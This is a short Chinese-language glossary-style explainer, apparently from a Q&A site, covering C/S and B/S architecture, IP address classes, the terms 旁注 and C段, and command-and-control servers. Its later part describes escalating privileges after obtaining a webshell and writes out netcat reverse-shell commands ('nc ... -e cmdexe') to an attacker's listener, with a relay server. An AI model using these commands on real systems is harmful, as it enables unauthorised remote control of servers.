CS、BS的含义

6C/S、B/S的含义
C/S表示客户端/服务器的模式C 是client，s是server。B/S是基于浏览器/server模式，B是browser，S是server，前者中的C是需要另外开发客户端程序的。而后者是基于浏览器来实现的，例如可以用IE等。

IP C段是由NIC根据用户单位的网络规模和近期 发展计划，分配IP地址空间。从概念上说，每个IP地址可以由两部分组成，即网络标识与netid和主机标识hostid。 A 类地址分配给给少数规模很大的网络，由该网的管理者自行分配。 B 类分配给中等规模的网络，也由该网的管理者自行分配。

渗透和嗅探和旁注和C段是什么意思

旁注的意思就是从同台服务器上的其他网站入手，就自然把那个网站端了。C段嗅探，每个IP有ABCD四个段，也就是说是D段1-255中的一台服务器，然后利用工具嗅探拿下该服务。

C&C 服务器的全称是 Command and Control Server，翻译过来就是命令和控制服务器

通常在做渗透测试的时候，在拿到一个 webshell 的时候，需要对服务器进行提权 *** 作，如果是一台 windows 的服务器，提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权，有些 exp 可以直接在后面加参数，溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd，这时就需要将低权限的 cmd shell 反d回本地，这里用 nc 在本地执行：nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接，假设电脑 IP 是公网的，并且 IP 为 114114114114，然后在目标服务器就可以执行：nc 114114114114 3333 -e cmdexe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地，这时你就可以通过 nc 建立的这个 shell 进行通信，发送你要执行的命令，在远程服务器接收到命令之后执行并将结果返回，这时本机电脑就是一个简易的 C&C 服务器。

扩展资料：

C&C 服务器使目标机器可以接收来自服务器的命令，从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接，所以可以使用一台中转服务器，这台中转服务器有一个公网 IP 地址是：111111111111，这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口，这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

---